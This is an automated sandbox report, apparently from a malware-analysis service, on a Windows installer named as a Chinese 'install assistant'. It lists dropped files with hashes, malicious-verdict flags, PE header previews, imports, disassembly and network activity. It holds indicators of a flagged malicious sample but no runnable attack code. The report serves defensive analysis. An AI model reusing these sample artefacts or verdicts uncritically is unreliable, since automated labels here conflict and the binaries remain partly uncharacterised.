                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5tti0ldj.dne.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p0asv0yc.hcg.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfhpiomj.nxk.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\_isetup\_setup64.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-3SJ46.tmp\update.vac

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606016
                            Entropy (8bit):7.0063494494702985
                            Encrypted:false
                            SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                            MD5:95ACD5631A9131DB1FD066565AFC9A67
                            SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                            SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                            SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\_isetup\_setup64.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-GHUQ4.tmp\update.vac

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:modified
                            Size (bytes):3606016
                            Entropy (8bit):7.0063494494702985
                            Encrypted:false
                            SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                            MD5:95ACD5631A9131DB1FD066565AFC9A67
                            SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                            SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                            SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-O2ISL.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp

                            Download File
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:modified
                            Size (bytes):3366912
                            Entropy (8bit):6.53056162407447
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:4E9D08C44F409F54940837360055C5AF
                            SHA1:2EBEB4ABC360E89F9C5BE2AA1224FDFE64C2EF3F
                            SHA-256:4255CCECE985C40464674B38FE1236335ECA66FF9B56EB4B8A66172816BE0AFA
                            SHA-512:1B137B0ECC43799E290E2D30310A0747A6991D256F8AD121A83050C0B375E59E48FC84DED9E741EFA4F02648CBA97F1D915FC371B9AC15CB59D38CB089047934
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                            C:\Users\user\AppData\Local\Temp\is-RRU7R.tmp\#U5b89#U88c5#U52a9#U624b2.0.5.tmp

                            Download File
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:modified
                            Size (bytes):3366912
                            Entropy (8bit):6.53056162407447
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:4E9D08C44F409F54940837360055C5AF
                            SHA1:2EBEB4ABC360E89F9C5BE2AA1224FDFE64C2EF3F
                            SHA-256:4255CCECE985C40464674B38FE1236335ECA66FF9B56EB4B8A66172816BE0AFA
                            SHA-512:1B137B0ECC43799E290E2D30310A0747A6991D256F8AD121A83050C0B375E59E48FC84DED9E741EFA4F02648CBA97F1D915FC371B9AC15CB59D38CB089047934
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                            \Device\ConDrv

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):406
                            Entropy (8bit):5.117520345541057
                            Encrypted:false
                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                            MD5:9200058492BCA8F9D88B4877F842C148
                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                            Malicious:false
                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.944057409331432
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.04%
                            • Inno Setup installer (109748/4) 1.08%
                            • InstallShield setup (43055/19) 0.42%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            File name:#U5b89#U88c5#U52a9#U624b2.0.5.exe
                            File size:7'064'515 bytes
                            MD5:87a72f4be35eff0b33e71d38146067b6
                            SHA1:18444d42be38abaaa8e41a643f3db7f89338accb
                            SHA256:be5caf69b35ebefb40069de05b80b28f4d89d532dd3661b39e0762556c89585d
                            SHA512:223ad82d28abb92c12a48e058cc08daa2962d9185875ffa97572cc5ec45ce99089389b6a63a0a947a0b4f7222189ac9d9eb026a1c8870580bb1f89f2487ce91a
                            SSDEEP:98304:XwREbtCJ/Nju8kgs2zUPncYVQkpszwcJwQaU6LggFzbgQhNOFdMwZgS:lbtYjk2zGnOkpDY6LggdFjCn
                            TLSH:4A661213F2CBE03EE05E0B3B05B2A15595FB6A216522AE5796ECB4ECCF351601D3E247
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                            File Icon

                            Icon Hash:0c0c2d33ceec80aa

                            Static PE Info

                            General

                            Entrypoint:0x4a83bc
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:40ab50289f7ef5fae60801f88d4541fc

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004A2EBCh
                            call 00007F95C0AC2E85h
                            xor eax, eax
                            push ebp
                            push 004A8AC1h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004A8A7Bh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004B0634h]
                            call 00007F95C0B5480Bh
                            call 00007F95C0B5435Eh
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007F95C0B4F038h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004B41F4h
                            call 00007F95C0ABCF33h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004B41F4h]
                            mov dl, 01h
                            mov eax, dword ptr [0049CD14h]
                            call 00007F95C0B50363h
                            mov dword ptr [004B41F8h], eax
                            xor edx, edx
                            push ebp
                            push 004A8A27h
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007F95C0B54893h
                            mov dword ptr [004B4200h], eax
                            mov eax, dword ptr [004B4200h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007F95C0B5B57Ah
                            mov eax, dword ptr [004B4200h]
                            mov edx, 00000028h
                            call 00007F95C0B50C58h
                            mov edx, dword ptr [004B4200h]

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .rsrc0xcb0000x110000x1100044348e47aa2b07662bc7f060f268583fFalse0.1877728630514706data3.723088785801902IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                            RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                            RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                            RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                            RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                            RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                            RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                            RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                            RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                            RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                            RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                            RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                            RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                            RT_STRING0xd8e000x3f8data0.3198818897637795
                            RT_STRING0xd91f80x2dcdata0.36475409836065575
                            RT_STRING0xd94d40x430data0.40578358208955223
                            RT_STRING0xd99040x44cdata0.38636363636363635
                            RT_STRING0xd9d500x2d4data0.39226519337016574
                            RT_STRING0xda0240xb8data0.6467391304347826
                            RT_STRING0xda0dc0x9cdata0.6410256410256411
                            RT_STRING0xda1780x374data0.4230769230769231
                            RT_STRING0xda4ec0x398data0.3358695652173913
                            RT_STRING0xda8840x368data0.3795871559633027
                            RT_STRING0xdabec0x2a4data0.4275147928994083
                            RT_RCDATA0xdae900x10data1.5
                            RT_RCDATA0xdaea00x310data0.6173469387755102
                            RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                            RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                            RT_VERSION0xdb2980x584dataEnglishUnited States0.278328611898017
                            RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                            Imports

                            DLLImport
                            kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                            comctl32.dllInitCommonControls
                            user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                            oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                            advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                            Exports

                            NameOrdinalAddress
                            __dbk_fcall_wrapper20x40fc10
                            dbkFCallWrapperAddr10x4b063c

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Network Port Distribution

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 24, 2024 13:13:08.523574114 CET5431853192.168.2.71.1.1.1

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 24, 2024 13:13:08.523574114 CET192.168.2.71.1.1.10x4c03Standard query (0)time.windows.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 24, 2024 13:13:08.661336899 CET1.1.1.1192.168.2.70x4c03No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:07:13:02
                            Start date:24/12/2024
                            Path:C:\Windows\System32\SgrmBroker.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\SgrmBroker.exe
                            Imagebase:0x7ff6179d0000
                            File size:329'504 bytes
                            MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:1
                            Start time:07:13:02
                            Start date:24/12/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                            Imagebase:0x7ff7b4ee0000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:2
                            Start time:07:13:02
                            Start date:24/12/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                            Imagebase:0x7ff7b4ee0000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:3
                            Start time:07:13:03
                            Start date:24/12/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                            Imagebase:0x7ff7b4ee0000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:4
                            Start time:07:13:03
                            Start date:24/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.5.exe"
                            Imagebase:0xd30000
                            File size:7'064'515 bytes
                            MD5 hash:87A72F4BE35EFF0B33E71D38146067B6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
